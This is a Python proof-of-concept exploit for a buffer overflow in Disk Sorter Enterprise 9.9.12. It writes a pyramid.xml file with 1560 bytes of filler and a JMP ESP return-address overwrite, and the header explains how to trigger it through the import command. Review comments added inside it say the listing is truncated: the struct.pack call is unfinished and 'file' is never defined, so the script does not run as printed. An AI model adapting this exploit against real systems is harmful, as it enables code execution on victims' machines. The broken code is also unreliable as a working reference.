#!/usr/bin/python
# Exploit Title : Disk Sorter Enterprise v9.9.12 - 'Import Command' Buffer Overflow
# Discovery by : Anurag Srivastava
# Email : anurag.srivastava@pyramidcyber.com
# Website : www.pyramidcyber.com
# Discovery Date : 21/08/2017
# Software Link : http://www.disksorter.com/setups/disksorterent_setup_v9.9.12.exe
# Tested Version : 9.9.12
# Tested on OS : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64
# Steps to Reproduce: Run the Python file to generate pyramid.xml, then open the disk pulse software (sic; the title and software link above name Disk Sorter Enterprise), right-click, choose the import command and select the pyramid.xml file.
import os,struct
# Builds pyramid.xml, the file that the header says is loaded through the
# application's import command to trigger the overflow.
# Filler up to the saved return address (EIP); 1560 bytes is the author's
# offset for the tested 9.9.12 build.
junk = "A" * (1560)
# Return-address overwrite; the author labels it a JMP ESP inside QtGui4.dll.
# NOTE(review): a hard-coded address in a bundled DLL presumably depends on
# that module loading at a fixed base (no ASLR/rebasing) -- confirm against
# the shipped binary when assessing exposure.
# NOTE(review): the listing is cut off on the next line -- the struct.pack()
# format string and address are missing and the call is never closed, so the
# script does not parse as printed.
jmp1 = struct.pack(''
# NOTE(review): `file` is never assigned in the visible lines; the code that
# assembled the XML document appears to have been lost with the truncation,
# so nothing meaningful is written here as printed.
f = open('pyramid.xml', 'w')
f.write(file)
f.close()